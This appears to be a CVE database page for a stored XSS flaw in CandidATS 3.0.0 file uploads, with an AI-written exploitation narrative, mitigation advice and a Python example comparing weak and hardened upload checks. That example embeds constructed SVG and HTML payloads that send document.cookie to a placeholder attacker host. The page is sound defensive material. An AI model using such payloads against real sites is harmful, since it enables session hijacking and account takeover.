CVE-2022-42750
Description
CandidATS version 3.0.0 allows an external attacker to steal the cookie of arbitrary users. This is possible because the application does not correctly validate the files uploaded by the user.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
CandidATS 3.0.0 fails to validate uploaded files, enabling stored XSS that lets an attacker steal cookies and take over accounts.
Vulnerability
CandidATS version 3.0.0 contains a stored cross-site scripting (XSS) vulnerability in the file upload functionality. The application does not correctly validate files uploaded by users, allowing an attacker to inject malicious scripts. The vulnerability is exploitable without authentication, though user interaction is required. The affected version is 3.0.0 only. [1][2]
Exploitation
An unauthenticated remote attacker uploads a file whose content is HTML, SVG or another browser-renderable format carrying JavaScript. The attacker then lures a victim, for example an administrator, into opening the stored file. Because the application serves the upload from its own origin, the victim's browser renders it as a page in that origin and the embedded script runs with access to the victim's cookies, which it can send to a host the attacker controls. With the stolen session cookie the attacker replays the victim's session and takes over the account. [2]
Impact
Successful exploitation allows the attacker to steal cookies of arbitrary users, leading to session hijacking and full account takeover. For an administrator account, the attacker gains complete control over the CandidATS instance, including access to sensitive candidate data and system configurations. The CIA impact is high across confidentiality, integrity, and availability. [2]
Mitigation
As of the public disclosure date (October 27, 2022), no patch is available for CandidATS 3.0.0. The vendor was contacted but has not released a fix. Until one exists, operators should close the upload path themselves rather than rely on a web application firewall, which only filters known payload shapes: allow-list the permitted extensions and verify that the file content matches the extension (magic bytes) instead of trusting the user-supplied name; store uploads under server-generated names outside the web root or on a separate origin; serve them with a fixed Content-Type, Content-Disposition: attachment and X-Content-Type-Options: nosniff so the browser does not render them inline; set HttpOnly on the session cookie so script cannot read it (this blunts cookie theft but does not stop script from acting within the session); restrict who may upload; and monitor for uploads with markup or script in their content. This vulnerability is not listed in CISA's Known Exploited Vulnerabilities (KEV) catalog as of the publication date. [2]
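The following is an added example, not CandidATS code, illustrating both the exploitation path above and the mitigations: a name-only upload check of the kind the advisory calls insufficient (the deny-list in `weak_check` is a generic illustration and an assumption, not the project's actual logic) beside a hardened check that allow-lists extensions, verifies magic bytes, stores files under random names and serves them with headers that prevent inline rendering. The SVG, HTML and PDF samples are constructed test inputs and `attacker.example` is a placeholder host.

```python
"""Added example (not CandidATS code): why a name-only upload check lets an
attacker store script, and the server-side checks that close that path.

Assumptions, labelled here and in comments: the deny-list in weak_check is a
generic illustration of a check that trusts the user-supplied name; the sample
files are constructed; attacker.example is a placeholder host.
"""
import os
import secrets

# --- constructed sample uploads ----------------------------------------------
# An SVG whose onload handler sends document.cookie off-site if a browser ever
# renders it inline on the application's origin (constructed, placeholder host).
SVG_PAYLOAD = (
    b'<?xml version="1.0"?>\n'
    b'<svg xmlns="http://www.w3.org/2000/svg" '
    b"onload=\"fetch('https://attacker.example/?c='+document.cookie)\"/>"
)
HTML_PAYLOAD = (
    b"<html><body><script>"
    b"new Image().src='https://attacker.example/?c='+document.cookie"
    b"</script></body></html>"
)
PDF_SAMPLE = b"%PDF-1.4\n1 0 obj<</Type/Catalog>>endobj\n%%EOF\n"

# --- the weak pattern: a deny-list on the user-supplied name (assumption) -----
DENIED_EXTENSIONS = {"php", "phtml", "phar", "exe"}


def extension_of(filename: str) -> str:
    """Last extension of the base name, lower-cased ('' if none)."""
    base = os.path.basename(filename)
    return base.rsplit(".", 1)[1].lower() if "." in base else ""


def weak_check(filename: str) -> bool:
    """Accepts anything not on a short deny-list: .html and .svg sail through,
    and nothing looks at the bytes. This is the class of check the advisory
    describes as insufficient (generic illustration, not CandidATS's code)."""
    return extension_of(filename) not in DENIED_EXTENSIONS


# --- the hardened pattern ------------------------------------------------------
# Allow-list: extension -> (magic bytes the content must start with, MIME type
# the server will assert when serving). No HTML, SVG, XML or script types.
ALLOWED_TYPES = {
    "pdf": (b"%PDF-", "application/pdf"),
    "png": (b"\x89PNG\r\n\x1a\n", "image/png"),
    "jpg": (b"\xff\xd8\xff", "image/jpeg"),
    "jpeg": (b"\xff\xd8\xff", "image/jpeg"),
}


def hardened_check(filename: str, data: bytes) -> tuple[bool, str]:
    """Allow-list the extension, then require the bytes to match it, so a
    renamed SVG/HTML file is rejected whatever its name says."""
    ext = extension_of(filename)
    if ext not in ALLOWED_TYPES:
        return False, f"extension {ext!r} not allowed"
    magic, _ = ALLOWED_TYPES[ext]
    if not data.startswith(magic):
        return False, f"content does not look like .{ext}"
    return True, "ok"


def stored_name(ext: str) -> str:
    """Random on-disk/URL name: the attacker never controls the path or name."""
    return f"{secrets.token_hex(16)}.{ext}"


def download_headers(ext: str, original_name: str) -> dict[str, str]:
    """Headers for serving an accepted file. Even if something slipped past the
    checks, the browser is told not to render it as a document on this origin."""
    _, mime = ALLOWED_TYPES[ext]
    safe_name = "".join(
        c for c in os.path.basename(original_name) if c.isalnum() or c in "._-"
    )
    return {
        "Content-Type": mime,                 # asserted from the allow-list, not sniffed
        "X-Content-Type-Options": "nosniff",  # forbid sniffing the body to text/html
        "Content-Disposition": f'attachment; filename="{safe_name}"',  # download, not inline
        "Content-Security-Policy": "sandbox",  # if rendered anyway: no script, opaque origin
    }


def session_cookie(name: str, value: str) -> str:
    """Set-Cookie with HttpOnly so script cannot read it via document.cookie.
    This limits cookie theft; it does not stop script from acting in-session."""
    return f"{name}={value}; Path=/; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    for name, data in (("resume.html", HTML_PAYLOAD), ("photo.png", SVG_PAYLOAD),
                       ("cv.pdf", PDF_SAMPLE)):
        print(name, "weak:", weak_check(name), "hardened:", hardened_check(name, data))
```

`weak_check` accepts `resume.html` and `photo.svg`, which is exactly the stored-script case; `hardened_check` rejects both by extension and also rejects SVG bytes uploaded as `photo.png` because the PNG magic is absent. The serving headers and the HttpOnly cookie are defence in depth for whatever the validator misses.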
AI Insight generated on May 25, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products (2)
- CandidATS/CandidATS
Patches (0)
No patches discovered yet.
References (2)
News mentions (0)
No linked articles in our index yet.